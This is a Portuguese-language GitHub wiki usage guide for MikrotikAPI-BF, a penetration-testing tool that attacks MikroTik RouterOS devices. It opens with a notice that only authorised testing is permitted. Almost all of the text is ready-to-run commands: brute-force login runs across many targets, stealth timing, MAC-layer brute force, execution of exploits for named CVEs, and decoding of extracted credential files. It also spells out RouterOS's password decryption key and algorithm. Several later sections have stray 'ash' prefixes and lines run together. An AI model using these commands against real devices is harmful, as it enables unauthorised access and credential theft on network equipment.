Complete Usage Guide pt BR - mrhenrike/MikrotikAPI-BF GitHub Wiki
Guia Completo de Uso — MikrotikAPI-BF v3.10.0 (pt-BR)
Apenas para testes de segurança autorizados. Todos os exemplos requerem permissão explícita e por escrito do proprietário do sistema alvo.
Início Rápido
git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
pip install -r requirements.txt
python mikrotikapi-bf.py --help
1. Força Bruta Básica
Alvo único, usuário único, lista de senhas
python mikrotikapi-bf.py -t 192.168.1.1 -U admin -d wordlists/passwords.lst
Lista de usuários + lista de senhas
python mikrotikapi-bf.py -t 192.168.1.1 -u usuarios.lst -p senhas.lst
Arquivo combo (usuario:senha)
python mikrotikapi-bf.py -t 192.168.1.1 -d combos.lst
Porta API customizada
python mikrotikapi-bf.py -t 192.168.1.1 --api-port 1337 -d senhas.lst
2. Multi-Alvo (v3.5.0+)
Arquivo alvos.txt (um IP por linha, # para comentários):
python mikrotikapi-bf.py -T alvos.txt -d senhas.lst -U admin
python mikrotikapi-bf.py --target-list alvos.txt -d combos.lst --threads 5
3. Validação de Serviços Pós-Login
# Valida FTP, SSH, Telnet após login bem-sucedido
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --validate ftp,ssh,telnet
# Portas customizadas
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --validate ftp=2121,ssh=2222
4. Varredura de CVEs / Vulnerabilidades
# Varrer CVEs aplicáveis à versão RouterOS detectada
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve -U admin -P senha
# Varrer TODOS os CVEs (independente da versão)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P senha
# Exportar resultados para JSON
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
-U admin -P senha --export json --export-dir ./resultados
5. MAC-Server / Descoberta Layer-2 (v3.3.0+)
Requer estar no mesmo segmento Layer-2 (VLAN/switch) que os alvos.
# Descobrir dispositivos Mikrotik no segmento L2 local
python mikrotikapi-bf.py --mac-discover
# Descobrir + força bruta via MAC-Telnet
python mikrotikapi-bf.py --mac-discover --mac-brute -d senhas.lst
# CVE-2018-14847 em todos os dispositivos descobertos
python mikrotikapi-bf.py --mac-scan-cve
6. Decodificadores Offline (v3.5.0+)
Decodificar user.dat (obtido via CVE-2018-14847)
python mikrotikapi-bf.py --decode-userdat user.dat
python mikrotikapi-bf.py --decode-userdat user.dat --decode-useridx user.idx
Algoritmo de descriptografia da senha RouterOS:
chave = MD5(usuario + "283i4jfkai3389") # 16 bytes
senha_em_claro = XOR(senha_criptografada, chave * 16)
Decodificar arquivo .backup
python mikrotikapi-bf.py --decode-backup router.backup
# Extrai todos os .dat/.idx e decodifica credenciais automaticamente
Analisar pacote NPK (CVE-2019-3977)
python mikrotikapi-bf.py --analyze-npk routeros.npk
Listar seções do supout.rif
python mikrotikapi-bf.py --decode-supout supout.rif
7. Modo Furtivo (Stealth)
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --stealth
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst -s 10 # 10s entre tentativas
8. Threads
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --threads 8 # máx: 15
9. Retomada de Sessão
# Iniciar com sessão
python mikrotikapi-bf.py -t 192.168.1.1 -d lista_grande.lst
# Retomar se interrompido
python mikrotikapi-bf.py -t 192.168.1.1 -d lista_grande.lst --resume
# Listar sessões salvas
python mikrotikapi-bf.py --list-sessions
10. Exportação de Resultados
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --export json
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --export-all --export-dir ./relatorio
11. REPL Interativo
python mikrotikapi-bf.py --interactive
# Dentro do REPL:
# mikrotik-bf> scan 192.168.1.0/24
# mikrotik-bf> fingerprint 192.168.1.1
# mikrotik-bf> attack 192.168.1.1 -w wordlists/combos.lst
# mikrotik-bf> exploits 192.168.1.1
# mikrotik-bf> results
# mikrotik-bf> export json
# mikrotik-bf> exit
12. Fluxo Completo de Pentest
# 1. Fingerprint
python mikrotikapi-bf.py -t 192.168.1.1 --fingerprint
# 2. Varredura CVE sem credenciais
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve
# 3. Força bruta furtiva
python mikrotikapi-bf.py -t 192.168.1.1 \
-u usuarios.lst -d senhas.lst \
--stealth --threads 3 --progress
# 4. Assessment completo com credenciais encontradas
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
-U admin -P "senha_encontrada" \
--validate ftp,ssh,telnet \
--export-all --export-dir ./relatorio/
# 5. Ataque MAC-Server (se no mesmo L2)
python mikrotikapi-bf.py --mac-discover --mac-brute -d combos.lst
# 6. Decodificar credenciais extraídas
python mikrotikapi-bf.py --decode-userdat /tmp/user.dat --decode-useridx /tmp/user.idx
18. Auto-instalacao NSE
ash mikrotikapi-install-nse mikrotikapi-bf --install-nse
19. Modo Alto Numero de Threads (ate 300)
ash python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --threads 100 --high-threads python mikrotikapi-bf.py -T alvos.lst -d combos.lst --threads 300 --high-threads
20. Perfis de Delay (v3.6.0+)
ash python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --delay-mode high python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --delay-mode stealth python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --delay-mode custom -s 0.5
21. Executar Exploit Especifico (v3.10.0+)
ash python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2018-14847 python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2023-30799 -U admin -P senha
22. Auditoria de Seguranca 8 Fases (v3.10.0+)
ash python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P senha --export sarif python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P senha --export-all
Fases: enumeracao de sistema, mapeamento de servicos, auditoria de credenciais, testes de injecao, sondagem Winbox, analise SNMP, endpoints debug, auditoria de firewall.